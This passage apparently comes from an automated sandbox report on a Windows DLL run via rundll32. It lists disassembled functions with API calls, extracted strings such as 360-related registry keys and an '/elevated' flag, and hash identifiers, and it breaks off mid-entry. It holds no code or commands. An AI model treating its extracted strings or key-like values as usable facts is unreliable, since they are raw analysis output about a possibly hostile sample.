                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQueryValuewcsstr
                                                                                                  • String ID: "%s" %s$/elevated
                                                                                                  • API String ID: 1248106594-1382985213
                                                                                                  • Opcode ID: 7d994b47a6feae35010406933b82370a9ece06ded3bcb5ee78e307a99859ddb1
                                                                                                  • Instruction ID: f3329ece6a2879d43efc8f52936060a6c90d44f89bf07b9cf1bbe3f09b4200fa
                                                                                                  • Opcode Fuzzy Hash: 7d994b47a6feae35010406933b82370a9ece06ded3bcb5ee78e307a99859ddb1
                                                                                                  • Instruction Fuzzy Hash: E241A432702B4489EB95CF65D8407DC33A5FB88BD4F15861AAE5E53BA4DF34C659C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180068954 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 113COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 000000018006A424: RegOpenKeyExW.ADVAPI32(?,?,?,?,00000000,0000000180068993,?,?,?,?,00000001,00000000,?,0000000180068D41), ref: 000000018006A44B
                                                                                                  • memset.MSVCRT ref: 00000001800689A4
                                                                                                    • Part of subcall function 000000018006A490: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,00000001800689D0,?,?,?,?,00000001,00000000,?,0000000180068D41), ref: 000000018006A4A9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: OpenQueryValuememset
                                                                                                  • String ID: ExpirationDate$IssueDate$Operator$SOFTWARE\360MachineSignature$SignData
                                                                                                  • API String ID: 733315865-1479031278
                                                                                                  • Opcode ID: 024b379d581b3895d461dc1fafaaa22704cd15f8aacd44fa0de35045f287b812
                                                                                                  • Instruction ID: ca32e24e8d646fa6672ed224415891838e44a9bb2fa0ab3c5403e0472a1cb0df
                                                                                                  • Opcode Fuzzy Hash: 024b379d581b3895d461dc1fafaaa22704cd15f8aacd44fa0de35045f287b812
                                                                                                  • Instruction Fuzzy Hash: DA411972B00B149AFB92DBA5D8447DD73B5BB487C8F148A16AE6853B58EF34C708CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000D19C Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@memset$??3@memmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 1691405456-0
                                                                                                  • Opcode ID: 898b7f6a28002f066823eb5036c047e985fc53dc141f5cbb7a005687aa805986
                                                                                                  • Instruction ID: 4c03d6f838081a40abf5c4ade735ff692b1a288c63e34611b63fa987e6e302c4
                                                                                                  • Opcode Fuzzy Hash: 898b7f6a28002f066823eb5036c047e985fc53dc141f5cbb7a005687aa805986
                                                                                                  • Instruction Fuzzy Hash: C7419F72311B9C81EA95CB65E5483AC73A5E748BE0F25C726AA7D07BD5DF38C289C310
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180052E84 Relevance: 9.1, APIs: 6, Instructions: 87networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$CleanupEnterErrorInstallLastLeaveNameSpaceStartupmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3860525367-0
                                                                                                  • Opcode ID: 566063b2480ce26a8a1017dda99dddd59a3f866f59b7cd308274edefec3830af
                                                                                                  • Instruction ID: 37d746e663b56e28a6a3e394405e8b675d481f719bc3bdb0db42ce8d24bf20fd
                                                                                                  • Opcode Fuzzy Hash: 566063b2480ce26a8a1017dda99dddd59a3f866f59b7cd308274edefec3830af
                                                                                                  • Instruction Fuzzy Hash: 57316E31700A4886F6A29F25EC443E973A0FB8DBD5F548531B96A972A1DF39C7898700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180015128 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 327COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountCriticalSectionTick$CloseEnterLeaveOpenQueryValue
                                                                                                  • String ID: dfsu11yy38277*(*6fhjsdkfds
                                                                                                  • API String ID: 4271658480-2650022146
                                                                                                  • Opcode ID: 0bb96f617ef2d1086e71c411e54c36657af4b2cd300dcf6be980ec3523e171b7
                                                                                                  • Instruction ID: dce0af6b373f41b2cde99525f258e7f40e176b48fd2bd51a90361080345aed67
                                                                                                  • Opcode Fuzzy Hash: 0bb96f617ef2d1086e71c411e54c36657af4b2cd300dcf6be980ec3523e171b7
                                                                                                  • Instruction Fuzzy Hash: 1DE19932200A0896EB92DB65E8443DD67A1F78DBD8F908125FE9D4B7A5DF38C789C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004B630 Relevance: 9.1, APIs: 6, Instructions: 69COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$AppendEnterFileModuleNamePathmemset$??2@CloseHandleLeaveOpenProcess_wcsicmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 1628498879-0
                                                                                                  • Opcode ID: c55fa3f1590a76b51b5719240098a001aea9683c9cdf89b49a24cf48f6b8042e
                                                                                                  • Instruction ID: 97b4a975282553c66a0ecb0666d5844a1919ec74819ec340ad2c10574fb99984
                                                                                                  • Opcode Fuzzy Hash: c55fa3f1590a76b51b5719240098a001aea9683c9cdf89b49a24cf48f6b8042e
                                                                                                  • Instruction Fuzzy Hash: C531AF71708A8881FBA2DF15E8543D673A1BBCD7C8F808025AA4947A95EF3DC709CB04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180064338 Relevance: 9.1, APIs: 6, Instructions: 67fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Size$CloseCreateHandleRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 1601809017-0
                                                                                                  • Opcode ID: 6c38b284369adc8e8a95ca7bd81b2def578c31ecd07c0865210070f76e2fb98a
                                                                                                  • Instruction ID: 513f97a3dac13d024bc23301dce07c49bc5a225dcf8c593d0dc48b4e525c804c
                                                                                                  • Opcode Fuzzy Hash: 6c38b284369adc8e8a95ca7bd81b2def578c31ecd07c0865210070f76e2fb98a
                                                                                                  • Instruction Fuzzy Hash: 2E21803260475487E7819F2AE8443997BA1F788FD0F658225EF6547BA4DF38C64ACB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000772C Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSectionfree$EnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 2088343094-0
                                                                                                  • Opcode ID: 5fbffbf8c2ffbaa84898e67539130a2069622187be2ddd364023f9f6dbb26b90
                                                                                                  • Instruction ID: 6eb304321519da1f53f45f1cff4b3a54b1501cb2ad61fff334524383177ac9c5
                                                                                                  • Opcode Fuzzy Hash: 5fbffbf8c2ffbaa84898e67539130a2069622187be2ddd364023f9f6dbb26b90
                                                                                                  • Instruction Fuzzy Hash: 9021A932B05A4482EB45CF65E49039D73A0F79CFC8F158011EA5E4B666CF38C65A8310
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800015C4 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountCriticalErrorInitializeLastSectionSpinmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1980634866-0
                                                                                                  • Opcode ID: f467f76a96eb9053b169918f2e1298c6cb4ef450960c952188422ab546d25163
                                                                                                  • Instruction ID: 02bb1c2e578d024aba7b1d294f23a26f9da54a41464e923504772a2296b722cf
                                                                                                  • Opcode Fuzzy Hash: f467f76a96eb9053b169918f2e1298c6cb4ef450960c952188422ab546d25163
                                                                                                  • Instruction Fuzzy Hash: 8E119E3470160ED1F7DAEB259C553E522A1BF9C782F64C01AF52B850A0EE28C74DC720
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004CD44 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 279COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$??3@
                                                                                                  • String ID: Catalog_Entries$Num_Catalog_Entries
                                                                                                  • API String ID: 1245774677-781996053
                                                                                                  • Opcode ID: 6b8a8c89c4b699f957cd55a4368444c75396a5c1355a13cca8d488b9109841c6
                                                                                                  • Instruction ID: 9fcea3ce77e1ed4f5330bab62f44b4aa9bf918aefdaa2edac95f8aa4354510da
                                                                                                  • Opcode Fuzzy Hash: 6b8a8c89c4b699f957cd55a4368444c75396a5c1355a13cca8d488b9109841c6
                                                                                                  • Instruction Fuzzy Hash: E6C14132205F8481DAA1CF15F98039EB3A4F789BE4F598625EAED47B98CF38C155C744
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004687C Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 248COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@??3@
                                                                                                  • String ID: Catalog_Entries$Num_Catalog_Entries
                                                                                                  • API String ID: 1936579350-781996053
                                                                                                  • Opcode ID: 37b5463f15d82ba4b2fcb730a9bc1d4a2b4fab43a6711b8c84a700227f9107d3
                                                                                                  • Instruction ID: d1be57a1d71c98b0b77dd863bddb056ffd98aca7a61043883bc55f1bcd24f70e
                                                                                                  • Opcode Fuzzy Hash: 37b5463f15d82ba4b2fcb730a9bc1d4a2b4fab43a6711b8c84a700227f9107d3
                                                                                                  • Instruction Fuzzy Hash: 46A1CB72B01F5882EA55DF25D98439C33A4E708BF8F1A8315EA68477E4EF34C69AC345
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018001D78C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 202COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Attributes$ExistsPath
                                                                                                  • String ID: ::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
                                                                                                  • API String ID: 3549565335-3700740638
                                                                                                  • Opcode ID: 1d0149c3f34552431bf59eb05347ec82fd401dfd2121ae44e8b2f54ac132c7fd
                                                                                                  • Instruction ID: 308d89a456878f58a443b3b63cbf74fe77f883dd4a59461d8164aca204eacb87
                                                                                                  • Opcode Fuzzy Hash: 1d0149c3f34552431bf59eb05347ec82fd401dfd2121ae44e8b2f54ac132c7fd
                                                                                                  • Instruction Fuzzy Hash: 8A915072700A489AEB95DF69C8403DD3361FB49BE4F408316EB6997AD5EF74CA59C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800253C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 196COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: \\?\$gfffffff
                                                                                                  • API String ID: 0-1566866656
                                                                                                  • Opcode ID: 92c2592203f147be486619f79412db35de23b2268a86ed145f873b14229e44a7
                                                                                                  • Instruction ID: bfc90c4694c0de5ac08ccb904688b68cff8c4fcbe65cd7113e56e150174f4709
                                                                                                  • Opcode Fuzzy Hash: 92c2592203f147be486619f79412db35de23b2268a86ed145f873b14229e44a7
                                                                                                  • Instruction Fuzzy Hash: 0C81C232700B488AEBA29B25E8403DE3360F789BE5F548315EEAA477D5DF78C649C704
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180040418 Relevance: 8.9, APIs: 7, Instructions: 155sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 000000018004048F
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800404A5
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800404DD
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 0000000180040553
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 0000000180040569
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800405A1
                                                                                                  • Sleep.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 000000018004061C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$Leave$Enter$Sleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 950586405-0
                                                                                                  • Opcode ID: 5fd251fa728f84f380744b40e651b61ba74c7f1c4af02f91f8a7010bdfac5f08
                                                                                                  • Instruction ID: e5e3152c6d786b815c8bb063f8079f541e8d353448f2aaa10215c0b82b1e43f2
                                                                                                  • Opcode Fuzzy Hash: 5fd251fa728f84f380744b40e651b61ba74c7f1c4af02f91f8a7010bdfac5f08
                                                                                                  • Instruction Fuzzy Hash: E8618C31301A4892FAD69B21EC943DA23A4F78DBE9F66C515ED6A572A1CF38C74DC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180010990 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateValue
                                                                                                  • String ID: 360scan
                                                                                                  • API String ID: 1818849710-2450673717
                                                                                                  • Opcode ID: 5bf155bf79df099cab00ad323e7c5f0b1ac545c6889d31c6f531c87adec6c7e2
                                                                                                  • Instruction ID: 36ede12e68d324247f48980037de7b94a87db2de9e86c0014956a12bc0703eb2
                                                                                                  • Opcode Fuzzy Hash: 5bf155bf79df099cab00ad323e7c5f0b1ac545c6889d31c6f531c87adec6c7e2
                                                                                                  • Instruction Fuzzy Hash: 4341B132714B9885F7928B75D8503DC2B70BB8CBE8F549215EEA953BA5DF78C24AC300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800671A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ?terminate@@ExceptionThrow__crt_fast_encode_pointermalloc
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 760693298-1018135373
                                                                                                  • Opcode ID: 39eb716e9be1fb63b9110d3c5425ec3b5de1197dc277d27b79cf19f29df3a86f
                                                                                                  • Instruction ID: 259617d04e03f410bbb53384dcf33072f4c9910d22c17cce453464633d750d07
                                                                                                  • Opcode Fuzzy Hash: 39eb716e9be1fb63b9110d3c5425ec3b5de1197dc277d27b79cf19f29df3a86f
                                                                                                  • Instruction Fuzzy Hash: CB41DD72310B4886DBA29F25E8807ADB3A2F748BC8F208016FB5D43B56CF38DA55C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180074740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96sleeplibraryloaderCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
